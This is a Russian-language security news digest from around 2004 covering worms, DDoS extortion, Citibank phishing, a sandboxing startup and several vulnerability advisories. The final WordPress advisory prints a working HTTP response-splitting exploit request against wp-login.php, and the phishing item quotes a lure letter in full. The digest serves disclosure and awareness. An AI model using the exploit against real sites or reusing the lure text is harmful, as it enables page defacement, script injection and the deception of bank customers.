Новый червь W32.Funner на время вывел из строя Интернет-пейджер MSN Messenger

Вчера служба мгновенного обмена сообщениями MSN Messenger бОльшую часть дня была недоступна для пользователей. И корпорация Microsoft, которой принадлежит MSN Messenger, официально подтвердила это. По мнению антивирусных специалистов, виноват в этом оказался новый червь W32.Funner, использующий некую дыру в системе защиты платформы Windows Messenger. Однако Microsoft отрицает связь между сбоями в работе MSN Messenger и атакой какого-либо вируса.

У антивирусной компании Symantec на этот счет другое мнение. В опубликованном ею предупреждении указывается, что в 32-разрядных версиях и серверной и клиентской платформы ОС Windows, в том числе в Windows XP и Windows Server 2003 имеется брешь в системе защиты, которую использует червь W32.Funner (в 64-разрядных версия Windows этой дыры нет). После заражения это червь, обнаружив на компьютере ПО пейджера MSN Messenger, пытается распространить свои копии через список контактов пользователя. Кроме того, он изменяет файл HOSTS в каталоге Windows, добавляя в него более 900 URL-адресов, которые, как сообщается, являются адресами азиатских порнографических и игровых сайтов. Никаких разрушительных действий на компьютере W32.Funner не производит, поэтому ему присвоен "низкий" рейтинг потенциальной опасности.

Рэкет в Интернете становится обычным явлением

Как минимум шесть-семь тысяч интернет-компаний регулярно выплачивают "дань" сетевым вымогателям и эпидемия кибер-вымогательства продолжает захватывать мир.

Выступая на презентации доклада "20 крупнейших уязвимостей интернета SANS Institute", директор по исследовательской работе этой организации Алан Паллер (Alan Paller) заявил, что проблема интернет-рэкета с каждым годом становится все острее. По его словам, на крючках вымогателей сидят практически все интернет-казино и многие другие компании, бизнес которых напрямую зависит от бесперебойной работы их веб-серверов.

Роль утюга, используемого сетевыми бандитами, по-прежнему выполняют DDoS-атаки, способные надолго вывести из строя сайт "клиента" и, таким образом, оставить его без посетителей и их денег. Интернет-компании, желающей избавиться от такой участи, обычно предлагают заплатить некоторую сумму отступных, чтобы какое-то время чувствовать себя в безопасности.

Как сообщает CNET, Роджер Камминг, возглавляющий находящийся в Великобритании Координационный центр безопасности национальной инфраструктуры (NISCC), также заявил, что бизнес, построенный интернет-вымогателями, уже достиг "невероятных" оборотов и проблема грозит перейти с локального на общенациональный уровень.

К сожалению, у экспертов по компьютерной безопасности пока нет эффективных инструментов для борьбы с сетевыми вымогателями. Тем более что, также как и в реальном мире, большинство жертв рэкета старается не информировать полицейские структуры о факте вымогательства, опасаясь потерять лицо и разозлить вымогателей.

Интернет-мошенники активизируются

Потери российских финансовых институтов от действий «кардеров» – мошенников, специализирующихся на подделке пластиковых банковских карт, достигли $20 млн. в год. Основным источником добычи информации о картах жертв становится интернет.

В последние 2 недели в Рунете отмечена массовая рассылка писем, ориентированных на клиентов Citibank –так называемый «фишинг». Письма рассылаются как на русском, так и на английском языке, все они требуют, чтобы получатель зашел на определённый сайт и обновил свои учетные данные. Российская версия «письма счастья» повествует о следующем: «На Ваш текущий счет был получен перевод в иностранной валюте на сумму, превышающую USD2,000. В соответствии с Пользовательским соглашением CitibankR Online, Вам необходимо подтвердить этот перевод для его успешного зачисления на Ваш текущий счет. Для подтверждения платежа просим Вас зайти в программу управления Вашим счетом CitibankR Online и следовать предложенным инструкциям. Если подтверждение не будет получено в течение 48 часов, платеж будет возвращен отправителю». Англоязычная версия предлагает обновить учетные записи в целях борьбы с интернет-мошенниками.

Среди российских банков на 1 апреля 2004 года Citibank находится на 11-м месте по размеру собственного капитала (8,96 млрд. руб.) и на 13-м месте по величине чистых активов (57,79 млрд. руб). Он занимает 35-е место среди розничных российских банков, сумма привлеченных вкладов составила 3,6 млрд. руб. Отделения «Ситибанка» открыты в России, на Украине, в Казахстане, в общей сложности они обслуживают около 2 тыс. корпоративных клиентов. Банком выпущено несколько десятков тысяч карт разных платёжных систем.

Чуть ранее десятки тысяч россиян получили письма, в которых получателям предлагалось открыть банковский счет на свое имя в каком-нибудь надежном американском банке. Для того чтобы выбрать кредитное учреждение, пользователям предлагается за 22 доллара купить справочник, который содержит информацию по открытию банковского счета в Америке. Интересно, что таких «предпринимателей» покарать практически невозможно, если за полученные $22 они высылают хоть какую-нибудь брошюру.

На подобных предложениях мошенники зарабатывают миллионы долларов. По статистике американского Института компьютерной безопасности, сообщает Newsru.com, преступления в кредитно-финансовой системе, совершенные с использованием компьютерных технологий, составляют 60–70% от общего числа расследуемых компьютерных преступлений. В списке пострадавших за прошлый год значатся такие крупные банки, как Barclays, Lloyds TSB и NatWest.

Эксперты рекомендуют россиянам относиться ко всем неожиданным предложениям с подозрением и решать дела с банком посредством персонального общения с его сотрудниками, даже если на это порой не хватает времени.

Дурдом для вирусов

У Зака Деховича (Zak Dechovitch) — основателя и управляющего директора небольшой израильской компании «SecureOL» — подход к разного рода компьютерным вирусам, червям и троянам довольно своеобразный. Он уверен: вместо того, чтобы бороться с ними, как это делают другие, мы должны гостеприимно распахивать перед ними врата наших компьютеров… Дело в том, что «SecureOL» разработала новую технологию, которая не позволит оказавшимся внутри назойливым гостям причинить какой-либо ущерб.

«Безопасность с помощью виртуализации» — так можно сформулировать новую концепцию, использованную в технологии, которая не только содержит в себе информацию о всех вирусных атаках, но и позволяет защитить пользователей от кражи интеллектуальной собственности, от кибер-преступлений и кибер-терроризма. Каждая программа с сопровождающими файлами работает на своем собственном виртуальном компьютере. Вторгаясь в него, вирусы или черви, естественно, «полагают», что причиняют ущерб. На самом же деле, они оказываются изолированными от других программ, будучи не в состоянии причинить вред как самому компьютеру, так и любым его программам. «Для каждой программы в системе наша технология создает виртуальный компьютер, — рассказывает 26-летний Дехович. — Не важно, что вирусы работают, важно, что они работают сами по себе. Выглядит это так, будто каждая программа работает на „чистом“ компьютере, и любой урон поэтому становится нерелевантным. Что же касается самого пользователя, то он ничего не подозревает о том, что творится на заднем плане, и продолжает работать в нормальном режиме. Вирус может вламываться в компьютер сколько угодно раз — для последнего он является не более чем мусором на жестком диске, который при желании легко стереть».

Зак Дехович — компьютерный гений, занимающийся программированием с пяти лет и стоящий за созданием специального отдела компьютерных преступлений в ЦАХАЛ. Идея создания «SecureOL» родилась у него и его друга Ярона Мейера (Yaron Mayer) в конце 2000 года, когда, наблюдая за израильским компьютерным рынком, они обратили внимание на неспособность большинства пользователей распознавать вирусы и спам. «Мы поняли, что если сумеем придумать нечто, работающее само по себе, пользователям не потребуется более волноваться относительно того, плоха или хороша та или иная программа», — рассказывает директор компании. Утвердившись в этой мысли, Дехович и Меер засучили рукава и взялись за разработку технологии. К 2001 году они уже отправили на регистрацию свой первый патент, а в ноябре 2002-го была основана «SecureOL».

Сегодня компания использует свою технологию для создания трех продуктов, два из которых покуда находятся на стадии разработки. В июле была выпущена программа «VE2», позволяющая пользователям делить компьютер на два не связанных между собой виртуальных пространства — общее и частное — и продаваемая сегодня в Израиле через компанию «DataSec», специализирующуюся на IT-услугах. Весь бизнес ведется в безопасном частном окружении, а общее используется для работы в Интернете, с электронной почтой, для инсталляции программ повышенного риска и обмена файлами. Новая программа предназначена, в основном, для банковской индустрии, здравоохранения, правительства и армии, она не пытается остановить спам и вирусы — просто лишает их доступа к внутренней засекреченной информации.

Впрочем, дифференцированный компьютер — идея не новая. Несколько лет назад другая израильская компания, «Voltaire», уже создала два компьютера в одном, однако прижиться на рынке товар с разделенным на две части монитором так и не смог. Тем не менее, Дехович полагает, что его фирма сможет добиться успеха, поскольку программа «VE2» позволяет переключаться с одного пространства на другое лишь кликом мышки. Кроме того, инсталляция программы занимает всего три минуты, причем пользователям нужно инсталлировать на один компьютер не две, а лишь одну операционную систему.

По словам основателя компании, технология «SecureOL» является куда более эффективной, нежели существующие антивирусные технологии. Сегодняшние антивирусные решения, как правило, требуют времени на создание необходимых патчей для новых вирусов. Дехович отмечает, к примеру, что недавний вирус «My Doom» сумел «отметиться» более чем 2,6 миллиона раз до того, как разработанное против него антивирусное решение начало действовать. Антивирусы также не в состоянии защитить пользователей от целенаправленных атак или кибер-шпионажа. Дехович, который родился на Украине и эмигрировал в Израиль пятилетним, утверждает, что кибер-шпионаж часто практикуется российской мафией: «Наша технология — единственный инструмент, способный остановить кибер-шпионаж», - уверен он.

Продавать свою продукцию «SecureOL» намерена через ассоциацию OEM, которая включит эту израильскую технологию в перечень своих товаров, либо через интернет-провайдеров. Когда компания достигнет успешных продаж в Израиле, Зак Дехович планирует начать расширяться и за рубежом: «В области информационной безопасности Израиль считается ведущей страной мира, и если мы сможем продавать наши программы здесь, то сможем делать это и в другом месте».

Макровирус Kamal прячется в документах Microsoft Word

Компания Symantec зафиксировала появление нового макровируса, инфицирующего документы Microsoft Word, cообщает "Компьюлента". После активации вредоносная программа, получившая название Kamal, выполняет несколько основных действий. Во-первых, Kamal выводит на дисплей информационное сообщение, содержащее символ "I". Во-вторых, вредоносная программа внедряется в шаблон Normal.dot и отключает антивирусную защиту вышеназванного текстового редактора. Наконец, в-третьих, Kamal изменяет свойства открываемых документов, добавляя в поля "Автор" и "Тема" строку "I-Worm.Kamila", а в поле "Заметки" - текст "Generated by I-Worm.Kamila". Широкого распространения макровирус Kamal пока не получил.

Уязвимость в новой версии Firefox

Разработчики Mozilla сообщили об очередной уязвимости в недавно выпущенной облегченной версии браузера - Mozilla FireFox. Теоретически, уязвимость может позволить потенциальным злоумышленникам удалить файлы из справочника загрузок, произведенных пользователем.

В настоящее время через автоматическое обновление уже доступна усовершенствованная версия с исправлением этой уязвимости. Любителям "ручной работы" также предложена автономная заплатка, которую можно установить самостоятельно.

20 октября в 14:00 в Москве, Санкт-Петербурге, Екатеринбурге, Краснодаре и Нижнем Новгороде состоится конференция "Информационные технологии – человеку, бизнесу, обществу".

Конференция "Информационные технологии – человеку, бизнесу, обществу" проводится в рамках IV международной выставки Министерства информационных технологий и связи РФ "Инфокоммуникации России – XXI" ("ИнфоКом-2004"). Конференция пройдет в пяти городах участниках выставки-форума "ИнфоКом-2004": Москве, Санкт-Петербурге, Екатеринбурге, Краснодаре и Нижнем Новгороде.

Тематика конференции разработана в соответствии с общей концепцией выставки и включает следующие основные разделы:

• актуальные вопросы создания "электронного правительства";
• электронная торговля: проблемы и перспективы развития;
• информатизация технологии в образовании, культуре, науке и медицине;
• социально значимые проекты в сфере информатизации.

Площадки проведения: в Москве – выставочный комплекс "Крокус Экспо", в Нижнем Новгороде – ВЗАО "Нижегородская ярмарка", в Санкт-Петербурге – музей им. А.С. Попова, в Краснодаре – "КраснодарEХРО", в Екатеринбурге – Дворец игровых видов спорта.

Во время конференции будут организованы видеовключения из всех городов – участников выставки-форума "ИнфоКом-2004".

В каждом городе примут участие представители со стороны Мининформсвязи России и его структурных организаций, аппарата Полномочных представителей Президента РФ в федеральных округах, администраций субъектов РФ, федеральных и региональных министерств и ведомств, научного и образовательного сообществ. Проведение конференции "Информационные технологии — человеку, бизнесу, обществу" одновременно в пяти федеральных округах России даст дополнительный импульс развитию инфокоммуникационных технологий во всех сферах общественной жизни данных регионов. Каждое из мероприятий даст возможность для обмена опытом по планируемым и реализованным проектам информатизации на федеральном, региональном и муниципальном уровнях.

Зарегистрироваться, а также получить более подробную информацию о мероприятиях форума "ИнфоКом-2004" можно на сайте: http://ccc.ru/infocom2004/ или по телефонам оргкомитета: (095) 234-5321, 234-5323.

Организатор: Журнал "Сети и системы связи".

Окончание регистрации участников: 19.10.2004, 18:00:00.

Очередная уязвимость в браузере Microsoft Internet Explorer

В браузере Microsoft Internet Explorer найдена очередная уязвимость. Как отмечается в бюллетене безопасности компании GreyMagic Software, дыра позволяет атакующему получить доступ к конфиденциальным XML-документам, хранящимся на удаленном компьютере. Брешь присутствует в пакетах Internet Explorer версий 5.01, 5.5 и 6.0. Примечательно, что о существовании проблемы было известно еще в 2002 году, и корпорация Microsoft даже выпустила соответствующий патч для своего браузера. Тем не менее, по информации GreyMagic Software, дыра до сих пор представляет потенциальную угрозу для пользователей IE. О наличии старой уязвимости сообщил известный исследователь компьютерной безопасности Georgi Guninski, настранице которого приводится также пример эксплоита. В качестве меры противодействия рекомендуется отключить поддержку Active Scripting.

Удаленное выполнение произвольных команд в BNC

Программа: BNC до версии 2.8.9 Опасность: Высокая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в BNC. Удаленный пользователь может послать произвольные команды к боту, на котором запущен BNC. Программа содержит уязвимость в обработке backspace символов (ASCII 8). Удаленный пользователь может послать данные, которые содержать backspace символы, чтобы удалить или заменить данные, посланные BNC боту, чтобы вызвать команды с произвольными опознавательными мандатами. URL производителя: http://www.gotbnc.com/index.html Решение:Установите обновленную версию программы (2.8.9): http://www.gotbnc.com/download.html

Уязвимость в Rippy the Aggregator

Программа: Rippy the Aggregator до версии 0.10 Опасность: Не известно Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Rippy the Aggregator. Воздействие не раскрывается. Уязвимость работает если включены 'register_globals' и 'allow_url_fopen'. Дополнительные подробности не раскрываются. URL производителя:http://ansuz.sooke.bc.ca/rippy.html Решение:Установите обновленную версию программы: http://ansuz.sooke.bc.ca/rippy-0.10.tgz

Неавторизованный доступ в Sticker Secure Messaging

Программа: Sticker Secure Messaging 3.1b1 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Sticker. Удаленный пользователь может послать безопасное сообщение к частной группе. Удаленный пользователь с доступом к открытому ключу может послать безопасное сообщение к защищенной группе с соответствующим открытым ключом. URL производителя: http://www.tickertape.org/projects/sticker/ Решение:Установите обновленную версию программы: http://www.tickertape.org/projects/sticker/#downloads

HTTP Response Splitting в WordPress

Программа: WordPress 1.2 Опасность: Средняя Наличие эксплоита: Да Описание: Обнаружена уязвимость при обработке входных данных. Удаленный атакующий может подменить содержание уязвимой страницы и выполнить произвольный сценарий в браузере жертвы. Эксплоит: POST /wp-login.php HTTP/1.0 Host: HOSTNAME Content-Type: application/x-www-form-urlencoded Content-length: 226 action=login&mode=profile&log=USER&pwd=PASS&text= %0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20 0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length: % 2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html> *defaced*</html> URL производителя: www.wordpress.org/ Решение:Установите обновление: wordpress.org/development/2004/10/wp-121/